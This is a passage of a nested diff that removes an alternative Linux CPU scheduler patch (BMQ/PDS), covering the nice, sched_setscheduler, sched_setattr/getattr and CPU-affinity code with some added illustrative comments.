-+		WARN_ON(p->pi_blocked_on);
-+		goto out_unlock;
-+	}
-+
-+	trace_sched_pi_setprio(p, pi_task);
-+
-+	__setscheduler_prio(p, prio);
-+
-+	check_task_changed(p, rq);
-+out_unlock:
-+	/* Avoid rq from going away on us: */
-+	preempt_disable();
-+
-+	__balance_callbacks(rq);
-+	__task_access_unlock(p, lock);
-+
-+	preempt_enable();
-+}
-+#else
-+static inline int rt_effective_prio(struct task_struct *p, int prio)
-+{
-+	return prio;
-+}
-+#endif
-+
-+void set_user_nice(struct task_struct *p, long nice)
-+{
-+	unsigned long flags;
-+	struct rq *rq;
-+	raw_spinlock_t *lock;
-+
-+	if (task_nice(p) == nice || nice < MIN_NICE || nice > MAX_NICE)
-+		return;
-+	/*
-+	 * We have to be careful: if called from sys_setpriority(),
-+	 * the task might be in the middle of scheduling on another CPU.
-+	 */
-+	raw_spin_lock_irqsave(&p->pi_lock, flags);
-+	rq = __task_access_lock(p, &lock);
-+
-+	p->static_prio = NICE_TO_PRIO(nice);
-+	/*
-+	 * The RT priorities are set via sched_setscheduler(), but we still
-+	 * allow the 'normal' nice value to be set - but as expected
-+	 * it won't have any effect on scheduling while the task's
-+	 * policy is not SCHED_NORMAL/SCHED_BATCH:
-+	 */
-+	if (task_has_rt_policy(p))
-+		goto out_unlock;
-+
-+	p->prio = effective_prio(p);
-+
-+	check_task_changed(p, rq);
-+out_unlock:
-+	__task_access_unlock(p, lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+}
-+EXPORT_SYMBOL(set_user_nice);
-+
-+/*
-+ * is_nice_reduction - check if nice value is an actual reduction
-+ *
-+ * Similar to can_nice() but does not perform a capability check.
-+ *
-+ * @p: task
-+ * @nice: nice value
-+ */
-+static bool is_nice_reduction(const struct task_struct *p, const int nice)
-+{
-+	/* Convert nice value [19,-20] to rlimit style value [1,40]: */
-+	int nice_rlim = nice_to_rlimit(nice);
-+
-+	return (nice_rlim <= task_rlimit(p, RLIMIT_NICE));
-+}
-+
-+/*
-+ * can_nice - check if a task can reduce its nice value
-+ * @p: task
-+ * @nice: nice value
-+ */
-+int can_nice(const struct task_struct *p, const int nice)
-+{
-+	return is_nice_reduction(p, nice) || capable(CAP_SYS_NICE);
-+}
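-+
-+/*
-+ * Worked example (illustrative): nice_to_rlimit() maps nice [19,-20] onto
-+ * the rlimit style range [1,40], i.e. nice_rlim = 20 - nice. With
-+ * RLIMIT_NICE set to 25, an unprivileged task may lower its nice value to
-+ * -5 (20 - (-5) = 25 <= 25); going to -6 requires CAP_SYS_NICE.
-+ */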
-+
-+#ifdef __ARCH_WANT_SYS_NICE
-+
-+/*
-+ * sys_nice - change the priority of the current process.
-+ * @increment: priority increment
-+ *
-+ * sys_setpriority is a more generic, but much slower function that
-+ * does similar things.
-+ */
-+SYSCALL_DEFINE1(nice, int, increment)
-+{
-+	long nice, retval;
-+
-+	/*
-+	 * Setpriority might change our priority at the same moment.
-+	 * We don't have to worry. Conceptually one call occurs first
-+	 * and we have a single winner.
-+	 */
-+
-+	increment = clamp(increment, -NICE_WIDTH, NICE_WIDTH);
-+	nice = task_nice(current) + increment;
-+
-+	nice = clamp_val(nice, MIN_NICE, MAX_NICE);
-+	if (increment < 0 && !can_nice(current, nice))
-+		return -EPERM;
-+
-+	retval = security_task_setnice(current, nice);
-+	if (retval)
-+		return retval;
-+
-+	set_user_nice(current, nice);
-+	return 0;
-+}
-+
-+#endif
-+
-+/**
-+ * task_prio - return the priority value of a given task.
-+ * @p: the task in question.
-+ *
-+ * Return: The priority value as seen by users in /proc.
-+ *
-+ * sched policy              return value    kernel prio     user prio/nice
-+ *
-+ * (BMQ)normal, batch, idle  [0 ... 53]      [100 ... 139]   0/[-20 ... 19]/[-7 ... 7]
-+ * (PDS)normal, batch, idle  [0 ... 39]      100             0/[-20 ... 19]
-+ * fifo, rr                  [-1 ... -100]   [99 ... 0]      [0 ... 99]
-+ */
-+int task_prio(const struct task_struct *p)
-+{
-+	return (p->prio < MAX_RT_PRIO) ? p->prio - MAX_RT_PRIO :
-+		task_sched_prio_normal(p, task_rq(p));
-+}
-+
-+/**
-+ * idle_cpu - is a given CPU idle currently?
-+ * @cpu: the processor in question.
-+ *
-+ * Return: 1 if the CPU is currently idle. 0 otherwise.
-+ */
-+int idle_cpu(int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+
-+	if (rq->curr != rq->idle)
-+		return 0;
-+
-+	if (rq->nr_running)
-+		return 0;
-+
-+#ifdef CONFIG_SMP
-+	if (rq->ttwu_pending)
-+		return 0;
-+#endif
-+
-+	return 1;
-+}
-+
-+/**
-+ * idle_task - return the idle task for a given CPU.
-+ * @cpu: the processor in question.
-+ *
-+ * Return: The idle task for the cpu @cpu.
-+ */
-+struct task_struct *idle_task(int cpu)
-+{
-+	return cpu_rq(cpu)->idle;
-+}
-+
-+/**
-+ * find_process_by_pid - find a process with a matching PID value.
-+ * @pid: the pid in question.
-+ *
-+ * Return: the task of @pid, if found. %NULL otherwise.
-+ */
-+static inline struct task_struct *find_process_by_pid(pid_t pid)
-+{
-+	return pid ? find_task_by_vpid(pid) : current;
-+}
-+
-+/*
-+ * sched_setparam() passes in -1 for its policy, to let the functions
-+ * it calls know not to change it.
-+ */
-+#define SETPARAM_POLICY -1
-+
-+static void __setscheduler_params(struct task_struct *p,
-+		const struct sched_attr *attr)
-+{
-+	int policy = attr->sched_policy;
-+
-+	if (policy == SETPARAM_POLICY)
-+		policy = p->policy;
-+
-+	p->policy = policy;
-+
-+	/*
-+	 * Allow the normal nice value to be set, but it will not have
-+	 * any effect on scheduling while the task's policy is not
-+	 * SCHED_NORMAL/SCHED_BATCH.
-+	 */
-+	p->static_prio = NICE_TO_PRIO(attr->sched_nice);
-+
-+	/*
-+	 * __sched_setscheduler() ensures attr->sched_priority == 0 when
-+	 * !rt_policy. Always setting this ensures that things like
-+	 * getparam()/getattr() don't report silly values for !rt tasks.
-+	 */
-+	p->rt_priority = attr->sched_priority;
-+	p->normal_prio = normal_prio(p);
-+}
-+
-+/*
-+ * check the target process has a UID that matches the current process's
-+ */
-+static bool check_same_owner(struct task_struct *p)
-+{
-+	const struct cred *cred = current_cred(), *pcred;
-+	bool match;
-+
-+	rcu_read_lock();
-+	pcred = __task_cred(p);
-+	match = (uid_eq(cred->euid, pcred->euid) ||
-+		 uid_eq(cred->euid, pcred->uid));
-+	rcu_read_unlock();
-+	return match;
-+}
-+
-+/*
-+ * Allow unprivileged RT tasks to decrease priority.
-+ * Only issue a capable test if needed and only once to avoid an audit
-+ * event on permitted non-privileged operations:
-+ */
-+static int user_check_sched_setscheduler(struct task_struct *p,
-+					 const struct sched_attr *attr,
-+					 int policy, int reset_on_fork)
-+{
-+	if (rt_policy(policy)) {
-+		unsigned long rlim_rtprio = task_rlimit(p, RLIMIT_RTPRIO);
-+
-+		/* Can't set/change the rt policy: */
-+		if (policy != p->policy && !rlim_rtprio)
-+			goto req_priv;
-+
-+		/* Can't increase priority: */
-+		if (attr->sched_priority > p->rt_priority &&
-+		    attr->sched_priority > rlim_rtprio)
-+			goto req_priv;
-+	}
-+
-+	/* Can't change other user's priorities: */
-+	if (!check_same_owner(p))
-+		goto req_priv;
-+
-+	/* Normal users shall not reset the sched_reset_on_fork flag: */
-+	if (p->sched_reset_on_fork && !reset_on_fork)
-+		goto req_priv;
-+
-+	return 0;
-+
-+req_priv:
-+	if (!capable(CAP_SYS_NICE))
-+		return -EPERM;
-+
-+	return 0;
-+}
-+
-+static int __sched_setscheduler(struct task_struct *p,
-+				const struct sched_attr *attr,
-+				bool user, bool pi)
-+{
-+	const struct sched_attr dl_squash_attr = {
-+		.size		= sizeof(struct sched_attr),
-+		.sched_policy	= SCHED_FIFO,
-+		.sched_nice	= 0,
-+		.sched_priority = 99,
-+	};
-+	int oldpolicy = -1, policy = attr->sched_policy;
-+	int retval, newprio;
-+	struct balance_callback *head;
-+	unsigned long flags;
-+	struct rq *rq;
-+	int reset_on_fork;
-+	raw_spinlock_t *lock;
-+
-+	/* The pi code expects interrupts enabled */
-+	BUG_ON(pi && in_interrupt());
-+
-+	/*
-+	 * Alt schedule FW supports SCHED_DEADLINE by squashing it into
-+	 * top-priority SCHED_FIFO (rt_priority 99, i.e. kernel prio 0)
-+	 */
-+	if (unlikely(SCHED_DEADLINE == policy)) {
-+		attr = &dl_squash_attr;
-+		policy = attr->sched_policy;
-+	}
-+recheck:
-+	/* Double check policy once rq lock held */
-+	if (policy < 0) {
-+		reset_on_fork = p->sched_reset_on_fork;
-+		policy = oldpolicy = p->policy;
-+	} else {
-+		reset_on_fork = !!(attr->sched_flags & SCHED_RESET_ON_FORK);
-+
-+		if (policy > SCHED_IDLE)
-+			return -EINVAL;
-+	}
-+
-+	if (attr->sched_flags & ~(SCHED_FLAG_ALL))
-+		return -EINVAL;
-+
-+	/*
-+	 * Valid priorities for SCHED_FIFO and SCHED_RR are
-+	 * 1..MAX_RT_PRIO-1, valid priority for SCHED_NORMAL and
-+	 * SCHED_BATCH and SCHED_IDLE is 0.
-+	 */
-+	if (attr->sched_priority < 0 ||
-+	    attr->sched_priority > MAX_RT_PRIO - 1)
-+		return -EINVAL;
-+	if ((SCHED_RR == policy || SCHED_FIFO == policy) !=
-+	    (attr->sched_priority != 0))
-+		return -EINVAL;
-+
-+	if (user) {
-+		retval = user_check_sched_setscheduler(p, attr, policy, reset_on_fork);
-+		if (retval)
-+			return retval;
-+
-+		retval = security_task_setscheduler(p);
-+		if (retval)
-+			return retval;
-+	}
-+
-+	if (pi)
-+		cpuset_read_lock();
-+
-+	/*
-+	 * Make sure no PI-waiters arrive (or leave) while we are
-+	 * changing the priority of the task:
-+	 */
-+	raw_spin_lock_irqsave(&p->pi_lock, flags);
-+
-+	/*
-+	 * To be able to change p->policy safely, task_access_lock()
-+	 * must be called.
-+	 * If task_access_lock() is used here:
-+	 * for a task p which is not running, reading rq->stop is
-+	 * racy but acceptable, as ->stop doesn't change much.
-+	 * An enhancement could be made to read rq->stop safely.
-+	 */
-+	rq = __task_access_lock(p, &lock);
-+
-+	/*
-+	 * Changing the policy of the stop thread is a very bad idea.
-+	 */
-+	if (p == rq->stop) {
-+		retval = -EINVAL;
-+		goto unlock;
-+	}
-+
-+	/*
-+	 * If not changing anything there's no need to proceed further:
-+	 */
-+	if (unlikely(policy == p->policy)) {
-+		if (rt_policy(policy) && attr->sched_priority != p->rt_priority)
-+			goto change;
-+		if (!rt_policy(policy) &&
-+		    NICE_TO_PRIO(attr->sched_nice) != p->static_prio)
-+			goto change;
-+
-+		p->sched_reset_on_fork = reset_on_fork;
-+		retval = 0;
-+		goto unlock;
-+	}
-+change:
-+
-+	/* Re-check policy now with rq lock held */
-+	if (unlikely(oldpolicy != -1 && oldpolicy != p->policy)) {
-+		policy = oldpolicy = -1;
-+		__task_access_unlock(p, lock);
-+		raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+		if (pi)
-+			cpuset_read_unlock();
-+		goto recheck;
-+	}
-+
-+	p->sched_reset_on_fork = reset_on_fork;
-+
-+	newprio = __normal_prio(policy, attr->sched_priority, NICE_TO_PRIO(attr->sched_nice));
-+	if (pi) {
-+		/*
-+		 * Take priority boosted tasks into account. If the new
-+		 * effective priority is unchanged, we just store the new
-+		 * normal parameters and do not touch the scheduler class and
-+		 * the runqueue. This will be done when the task deboosts
-+		 * itself.
-+		 */
-+		newprio = rt_effective_prio(p, newprio);
-+	}
-+
-+	if (!(attr->sched_flags & SCHED_FLAG_KEEP_PARAMS)) {
-+		__setscheduler_params(p, attr);
-+		__setscheduler_prio(p, newprio);
-+	}
-+
-+	check_task_changed(p, rq);
-+
-+	/* Avoid rq from going away on us: */
-+	preempt_disable();
-+	head = splice_balance_callbacks(rq);
-+	__task_access_unlock(p, lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+
-+	if (pi) {
-+		cpuset_read_unlock();
-+		rt_mutex_adjust_pi(p);
-+	}
-+
-+	/* Run balance callbacks after we've adjusted the PI chain: */
-+	balance_callbacks(rq, head);
-+	preempt_enable();
-+
-+	return 0;
-+
-+unlock:
-+	__task_access_unlock(p, lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+	if (pi)
-+		cpuset_read_unlock();
-+	return retval;
-+}
-+
-+static int _sched_setscheduler(struct task_struct *p, int policy,
-+			       const struct sched_param *param, bool check)
-+{
-+	struct sched_attr attr = {
-+		.sched_policy   = policy,
-+		.sched_priority = param->sched_priority,
-+		.sched_nice     = PRIO_TO_NICE(p->static_prio),
-+	};
-+
-+	/* Fixup the legacy SCHED_RESET_ON_FORK hack. */
-+	if ((policy != SETPARAM_POLICY) && (policy & SCHED_RESET_ON_FORK)) {
-+		attr.sched_flags |= SCHED_FLAG_RESET_ON_FORK;
-+		policy &= ~SCHED_RESET_ON_FORK;
-+		attr.sched_policy = policy;
-+	}
-+
-+	return __sched_setscheduler(p, &attr, check, true);
-+}
-+
-+/**
-+ * sched_setscheduler - change the scheduling policy and/or RT priority of a thread.
-+ * @p: the task in question.
-+ * @policy: new policy.
-+ * @param: structure containing the new RT priority.
-+ *
-+ * Use sched_set_fifo(), read its comment.
-+ *
-+ * Return: 0 on success. An error code otherwise.
-+ *
-+ * NOTE that the task may already be dead.
-+ */
-+int sched_setscheduler(struct task_struct *p, int policy,
-+		       const struct sched_param *param)
-+{
-+	return _sched_setscheduler(p, policy, param, true);
-+}
-+
-+int sched_setattr(struct task_struct *p, const struct sched_attr *attr)
-+{
-+	return __sched_setscheduler(p, attr, true, true);
-+}
-+
-+int sched_setattr_nocheck(struct task_struct *p, const struct sched_attr *attr)
-+{
-+	return __sched_setscheduler(p, attr, false, true);
-+}
-+EXPORT_SYMBOL_GPL(sched_setattr_nocheck);
-+
-+/**
-+ * sched_setscheduler_nocheck - change the scheduling policy and/or RT priority of a thread from kernelspace.
-+ * @p: the task in question.
-+ * @policy: new policy.
-+ * @param: structure containing the new RT priority.
-+ *
-+ * Just like sched_setscheduler, only don't bother checking if the
-+ * current context has permission.  For example, this is needed in
-+ * stop_machine(): we create temporary high priority worker threads,
-+ * but our caller might not have that capability.
-+ *
-+ * Return: 0 on success. An error code otherwise.
-+ */
-+int sched_setscheduler_nocheck(struct task_struct *p, int policy,
-+			       const struct sched_param *param)
-+{
-+	return _sched_setscheduler(p, policy, param, false);
-+}
-+
-+/*
-+ * SCHED_FIFO is a broken scheduler model; that is, it is fundamentally
-+ * incapable of resource management, which is the one thing an OS really should
-+ * be doing.
-+ *
-+ * This is of course the reason it is limited to privileged users only.
-+ *
-+ * Worse still; it is fundamentally impossible to compose static priority
-+ * workloads. You cannot take two correctly working static prio workloads
-+ * and smash them together and still expect them to work.
-+ *
-+ * For this reason 'all' FIFO tasks the kernel creates are basically at:
-+ *
-+ *   MAX_RT_PRIO / 2
-+ *
-+ * The administrator _MUST_ configure the system; the kernel simply doesn't
-+ * have enough information to make a sensible choice.
-+ */
-+void sched_set_fifo(struct task_struct *p)
-+{
-+	struct sched_param sp = { .sched_priority = MAX_RT_PRIO / 2 };
-+	WARN_ON_ONCE(sched_setscheduler_nocheck(p, SCHED_FIFO, &sp) != 0);
-+}
-+EXPORT_SYMBOL_GPL(sched_set_fifo);
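-+
-+/*
-+ * Illustrative usage sketch (not part of the original patch): a driver
-+ * that needs an RT kthread would typically do
-+ *
-+ *	struct task_struct *t = kthread_create(my_fn, my_data, "my-rt-thread");
-+ *
-+ *	if (!IS_ERR(t)) {
-+ *		sched_set_fifo(t);
-+ *		wake_up_process(t);
-+ *	}
-+ *
-+ * where my_fn/my_data are hypothetical; the thread then runs at the
-+ * MAX_RT_PRIO / 2 priority described above.
-+ */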
-+
-+/*
-+ * For when you don't much care about FIFO, but want to be above SCHED_NORMAL.
-+ */
-+void sched_set_fifo_low(struct task_struct *p)
-+{
-+	struct sched_param sp = { .sched_priority = 1 };
-+	WARN_ON_ONCE(sched_setscheduler_nocheck(p, SCHED_FIFO, &sp) != 0);
-+}
-+EXPORT_SYMBOL_GPL(sched_set_fifo_low);
-+
-+void sched_set_normal(struct task_struct *p, int nice)
-+{
-+	struct sched_attr attr = {
-+		.sched_policy = SCHED_NORMAL,
-+		.sched_nice = nice,
-+	};
-+	WARN_ON_ONCE(sched_setattr_nocheck(p, &attr) != 0);
-+}
-+EXPORT_SYMBOL_GPL(sched_set_normal);
-+
-+static int
-+do_sched_setscheduler(pid_t pid, int policy, struct sched_param __user *param)
-+{
-+	struct sched_param lparam;
-+	struct task_struct *p;
-+	int retval;
-+
-+	if (!param || pid < 0)
-+		return -EINVAL;
-+	if (copy_from_user(&lparam, param, sizeof(struct sched_param)))
-+		return -EFAULT;
-+
-+	rcu_read_lock();
-+	retval = -ESRCH;
-+	p = find_process_by_pid(pid);
-+	if (likely(p))
-+		get_task_struct(p);
-+	rcu_read_unlock();
-+
-+	if (likely(p)) {
-+		retval = sched_setscheduler(p, policy, &lparam);
-+		put_task_struct(p);
-+	}
-+
-+	return retval;
-+}
-+
-+/*
-+ * Mimics kernel/events/core.c perf_copy_attr().
-+ */
-+static int sched_copy_attr(struct sched_attr __user *uattr, struct sched_attr *attr)
-+{
-+	u32 size;
-+	int ret;
-+
-+	/* Zero the full structure, so that a short copy will be nice: */
-+	memset(attr, 0, sizeof(*attr));
-+
-+	ret = get_user(size, &uattr->size);
-+	if (ret)
-+		return ret;
-+
-+	/* ABI compatibility quirk: */
-+	if (!size)
-+		size = SCHED_ATTR_SIZE_VER0;
-+
-+	if (size < SCHED_ATTR_SIZE_VER0 || size > PAGE_SIZE)
-+		goto err_size;
-+
-+	ret = copy_struct_from_user(attr, sizeof(*attr), uattr, size);
-+	if (ret) {
-+		if (ret == -E2BIG)
-+			goto err_size;
-+		return ret;
-+	}
-+
-+	/*
-+	 * XXX: Do we want to be lenient like existing syscalls; or do we want
-+	 * to be strict and return an error on out-of-bounds values?
-+	 */
-+	attr->sched_nice = clamp(attr->sched_nice, -20, 19);
-+
-+	/* sched/core.c uses zero here but we already know ret is zero */
-+	return 0;
-+
-+err_size:
-+	put_user(sizeof(*attr), &uattr->size);
-+	return -E2BIG;
-+}
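-+
-+/*
-+ * Worked example (illustrative, not part of the original patch): an old
-+ * binary passing uattr->size == 0 is treated as SCHED_ATTR_SIZE_VER0
-+ * (48 bytes). A newer binary passing a size larger than the kernel's
-+ * struct has the excess bytes checked by copy_struct_from_user(), which
-+ * fails with -E2BIG only if any unknown trailing field is non-zero.
-+ */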
-+
-+/**
-+ * sys_sched_setscheduler - set/change the scheduler policy and RT priority
-+ * @pid: the pid in question.
-+ * @policy: new policy.
-+ * @param: structure containing the new RT priority.
-+ *
-+ * Return: 0 on success. An error code otherwise.
-+ */
-+SYSCALL_DEFINE3(sched_setscheduler, pid_t, pid, int, policy, struct sched_param __user *, param)
-+{
-+	if (policy < 0)
-+		return -EINVAL;
-+
-+	return do_sched_setscheduler(pid, policy, param);
-+}
-+
-+/**
-+ * sys_sched_setparam - set/change the RT priority of a thread
-+ * @pid: the pid in question.
-+ * @param: structure containing the new RT priority.
-+ *
-+ * Return: 0 on success. An error code otherwise.
-+ */
-+SYSCALL_DEFINE2(sched_setparam, pid_t, pid, struct sched_param __user *, param)
-+{
-+	return do_sched_setscheduler(pid, SETPARAM_POLICY, param);
-+}
-+
-+/**
-+ * sys_sched_setattr - same as above, but with extended sched_attr
-+ * @pid: the pid in question.
-+ * @uattr: structure containing the extended parameters.
-+ * @flags: for future extension.
-+ */
-+SYSCALL_DEFINE3(sched_setattr, pid_t, pid, struct sched_attr __user *, uattr,
-+			       unsigned int, flags)
-+{
-+	struct sched_attr attr;
-+	struct task_struct *p;
-+	int retval;
-+
-+	if (!uattr || pid < 0 || flags)
-+		return -EINVAL;
-+
-+	retval = sched_copy_attr(uattr, &attr);
-+	if (retval)
-+		return retval;
-+
-+	if ((int)attr.sched_policy < 0)
-+		return -EINVAL;
-+
-+	rcu_read_lock();
-+	retval = -ESRCH;
-+	p = find_process_by_pid(pid);
-+	if (likely(p))
-+		get_task_struct(p);
-+	rcu_read_unlock();
-+
-+	if (likely(p)) {
-+		retval = sched_setattr(p, &attr);
-+		put_task_struct(p);
-+	}
-+
-+	return retval;
-+}
-+
-+/**
-+ * sys_sched_getscheduler - get the policy (scheduling class) of a thread
-+ * @pid: the pid in question.
-+ *
-+ * Return: On success, the policy of the thread. Otherwise, a negative error
-+ * code.
-+ */
-+SYSCALL_DEFINE1(sched_getscheduler, pid_t, pid)
-+{
-+	struct task_struct *p;
-+	int retval = -EINVAL;
-+
-+	if (pid < 0)
-+		goto out_nounlock;
-+
-+	retval = -ESRCH;
-+	rcu_read_lock();
-+	p = find_process_by_pid(pid);
-+	if (p) {
-+		retval = security_task_getscheduler(p);
-+		if (!retval)
-+			retval = p->policy;
-+	}
-+	rcu_read_unlock();
-+
-+out_nounlock:
-+	return retval;
-+}
-+
-+/**
-+ * sys_sched_getparam - get the RT priority of a thread
-+ * @pid: the pid in question.
-+ * @param: structure containing the RT priority.
-+ *
-+ * Return: On success, 0 and the RT priority is in @param. Otherwise, an error
-+ * code.
-+ */
-+SYSCALL_DEFINE2(sched_getparam, pid_t, pid, struct sched_param __user *, param)
-+{
-+	struct sched_param lp = { .sched_priority = 0 };
-+	struct task_struct *p;
-+	int retval = -EINVAL;
-+
-+	if (!param || pid < 0)
-+		goto out_nounlock;
-+
-+	rcu_read_lock();
-+	p = find_process_by_pid(pid);
-+	retval = -ESRCH;
-+	if (!p)
-+		goto out_unlock;
-+
-+	retval = security_task_getscheduler(p);
-+	if (retval)
-+		goto out_unlock;
-+
-+	if (task_has_rt_policy(p))
-+		lp.sched_priority = p->rt_priority;
-+	rcu_read_unlock();
-+
-+	/*
-+	 * This one might sleep; we cannot do it with a spinlock held ...
-+	 */
-+	retval = copy_to_user(param, &lp, sizeof(*param)) ? -EFAULT : 0;
-+
-+out_nounlock:
-+	return retval;
-+
-+out_unlock:
-+	rcu_read_unlock();
-+	return retval;
-+}
-+
-+/*
-+ * Copy the kernel size attribute structure (which might be larger
-+ * than what user-space knows about) to user-space.
-+ *
-+ * Note that all cases are valid: user-space buffer can be larger or
-+ * smaller than the kernel-space buffer. The usual case is that both
-+ * have the same size.
-+ */
-+static int
-+sched_attr_copy_to_user(struct sched_attr __user *uattr,
-+			struct sched_attr *kattr,
-+			unsigned int usize)
-+{
-+	unsigned int ksize = sizeof(*kattr);
-+
-+	if (!access_ok(uattr, usize))
-+		return -EFAULT;
-+
-+	/*
-+	 * sched_getattr() ABI forwards and backwards compatibility:
-+	 *
-+	 * If usize == ksize then we just copy everything to user-space and all is good.
-+	 *
-+	 * If usize < ksize then we only copy as much as user-space has space for,
-+	 * this keeps ABI compatibility as well. We skip the rest.
-+	 *
-+	 * If usize > ksize then user-space is using a newer version of the ABI,
-+	 * parts of which the kernel doesn't know about. Just ignore them - tooling can
-+	 * detect the kernel's knowledge of attributes from the attr->size value
-+	 * which is set to ksize in this case.
-+	 */
-+	kattr->size = min(usize, ksize);
-+
-+	if (copy_to_user(uattr, kattr, kattr->size))
-+		return -EFAULT;
-+
-+	return 0;
-+}
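-+
-+/*
-+ * Worked example (illustrative, not part of the original patch):
-+ * assuming the kernel's sched_attr is 56 bytes, a caller passing
-+ * usize = 48 (an older ABI) gets kattr->size = 48 and only the first
-+ * 48 bytes copied out, while a caller passing usize = 64 (a newer ABI)
-+ * gets kattr->size = 56, telling tooling exactly how much the kernel
-+ * filled in.
-+ */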
-+
-+/**
-+ * sys_sched_getattr - similar to sched_getparam, but with sched_attr
-+ * @pid: the pid in question.
-+ * @uattr: structure containing the extended parameters.
-+ * @usize: sizeof(attr) for fwd/bwd comp.
-+ * @flags: for future extension.
-+ */
-+SYSCALL_DEFINE4(sched_getattr, pid_t, pid, struct sched_attr __user *, uattr,
-+		unsigned int, usize, unsigned int, flags)
-+{
-+	struct sched_attr kattr = { };
-+	struct task_struct *p;
-+	int retval;
-+
-+	if (!uattr || pid < 0 || usize > PAGE_SIZE ||
-+	    usize < SCHED_ATTR_SIZE_VER0 || flags)
-+		return -EINVAL;
-+
-+	rcu_read_lock();
-+	p = find_process_by_pid(pid);
-+	retval = -ESRCH;
-+	if (!p)
-+		goto out_unlock;
-+
-+	retval = security_task_getscheduler(p);
-+	if (retval)
-+		goto out_unlock;
-+
-+	kattr.sched_policy = p->policy;
-+	if (p->sched_reset_on_fork)
-+		kattr.sched_flags |= SCHED_FLAG_RESET_ON_FORK;
-+	if (task_has_rt_policy(p))
-+		kattr.sched_priority = p->rt_priority;
-+	else
-+		kattr.sched_nice = task_nice(p);
-+	kattr.sched_flags &= SCHED_FLAG_ALL;
-+
-+#ifdef CONFIG_UCLAMP_TASK
-+	kattr.sched_util_min = p->uclamp_req[UCLAMP_MIN].value;
-+	kattr.sched_util_max = p->uclamp_req[UCLAMP_MAX].value;
-+#endif
-+
-+	rcu_read_unlock();
-+
-+	return sched_attr_copy_to_user(uattr, &kattr, usize);
-+
-+out_unlock:
-+	rcu_read_unlock();
-+	return retval;
-+}
-+
-+static int
-+__sched_setaffinity(struct task_struct *p, const struct cpumask *mask)
-+{
-+	int retval;
-+	cpumask_var_t cpus_allowed, new_mask;
-+
-+	if (!alloc_cpumask_var(&cpus_allowed, GFP_KERNEL))
-+		return -ENOMEM;
-+
-+	if (!alloc_cpumask_var(&new_mask, GFP_KERNEL)) {
-+		retval = -ENOMEM;
-+		goto out_free_cpus_allowed;
-+	}
-+
-+	cpuset_cpus_allowed(p, cpus_allowed);
-+	cpumask_and(new_mask, mask, cpus_allowed);
-+again:
-+	retval = __set_cpus_allowed_ptr(p, new_mask, SCA_CHECK | SCA_USER);
-+	if (retval)
-+		goto out_free_new_mask;
-+
-+	cpuset_cpus_allowed(p, cpus_allowed);
-+	if (!cpumask_subset(new_mask, cpus_allowed)) {
-+		/*
-+		 * We must have raced with a concurrent cpuset
-+		 * update. Just reset the cpus_allowed to the
-+		 * cpuset's cpus_allowed
-+		 */
-+		cpumask_copy(new_mask, cpus_allowed);
-+		goto again;
-+	}
-+
-+out_free_new_mask:
-+	free_cpumask_var(new_mask);
-+out_free_cpus_allowed:
-+	free_cpumask_var(cpus_allowed);
-+	return retval;
-+}
-+
-+long sched_setaffinity(pid_t pid, const struct cpumask *in_mask)
-+{
-+	struct task_struct *p;
-+	int retval;
-+
-+	rcu_read_lock();
-+
-+	p = find_process_by_pid(pid);
-+	if (!p) {
-+		rcu_read_unlock();
-+		return -ESRCH;
-+	}
-+
-+	/* Prevent p going away */
-+	get_task_struct(p);
-+	rcu_read_unlock();
-+
-+	if (p->flags & PF_NO_SETAFFINITY) {
-+		retval = -EINVAL;
-+		goto out_put_task;
-+	}
-+
-+	if (!check_same_owner(p)) {
-+		rcu_read_lock();
-+		if (!ns_capable(__task_cred(p)->user_ns, CAP_SYS_NICE)) {
-+			rcu_read_unlock();
-+			retval = -EPERM;
-+			goto out_put_task;
-+		}
-+		rcu_read_unlock();
-+	}
-+
-+	retval = security_task_setscheduler(p);
-+	if (retval)
-+		goto out_put_task;
-+
-+	retval = __sched_setaffinity(p, in_mask);
-+out_put_task:
-+	put_task_struct(p);
-+	return retval;
-+}
-+
-+static int get_user_cpu_mask(unsigned long __user *user_mask_ptr, unsigned len,
-+			     struct cpumask *new_mask)
-+{
-+	if (len < cpumask_size())
-+		cpumask_clear(new_mask);
-+	else if (len > cpumask_size())
-+		len = cpumask_size();
-+
-+	return copy_from_user(new_mask, user_mask_ptr, len) ? -EFAULT : 0;
-+}
-+
-+/**
-+ * sys_sched_setaffinity - set the CPU affinity of a process
-+ * @pid: pid of the process
-+ * @len: length in bytes of the bitmask pointed to by user_mask_ptr
-+ * @user_mask_ptr: user-space pointer to the new CPU mask
-+ *
-+ * Return: 0 on success. An error code otherwise.
-+ */
-+SYSCALL_DEFINE3(sched_setaffinity, pid_t, pid, unsigned int, len,
-+		unsigned long __user *, user_mask_ptr)
-+{
-+	cpumask_var_t new_mask;
-+	int retval;
-+
-+	if (!alloc_cpumask_var(&new_mask, GFP_KERNEL))
-+		return -ENOMEM;
-+
-+	retval = get_user_cpu_mask(user_mask_ptr, len, new_mask);
-+	if (retval == 0)
-+		retval = sched_setaffinity(pid, new_mask);
-+	free_cpumask_var(new_mask);
-+	return retval;
-+}
-+
-+long sched_getaffinity(pid_t pid, cpumask_t *mask)
-+{
-+	struct task_struct *p;
-+	raw_spinlock_t *lock;
-+	unsigned long flags;
-+	int retval;
-+
-+	rcu_read_lock();
-+
-+	retval = -ESRCH;
-+	p = find_process_by_pid(pid);
-+	if (!p)
-+		goto out_unlock;
-+
-+	retval = security_task_getscheduler(p);
-+	if (retval)
-+		goto out_unlock;
-+
-+	task_access_lock_irqsave(p, &lock, &flags);
-+	cpumask_and(mask, &p->cpus_mask, cpu_active_mask);
-+	task_access_unlock_irqrestore(p, lock, &flags);
-+
-+out_unlock:
-+	rcu_read_unlock();
-+
-+	return retval;
-+}
-+
-+/**
-+ * sys_sched_getaffinity - get the CPU affinity of a process
-+ * @pid: pid of the process
-+ * @len: length in bytes of the bitmask pointed to by user_mask_ptr
-+ * @user_mask_ptr: user-space pointer to hold the current CPU mask
-+ *
-+ * Return: size of CPU mask copied to user_mask_ptr on success. An
-+ * error code otherwise.
-+ */
-+SYSCALL_DEFINE3(sched_getaffinity, pid_t, pid, unsigned int, len,
-+		unsigned long __user *, user_mask_ptr)
-+{
-+	int ret;
-+	cpumask_var_t mask;
-+
-+	if ((len * BITS_PER_BYTE) < nr_cpu_ids)
-+		return -EINVAL;
-+	if (len & (sizeof(unsigned long)-1))
-+		return -EINVAL;
-+
-+	if (!alloc_cpumask_var(&mask, GFP_KERNEL))
-+		return -ENOMEM;
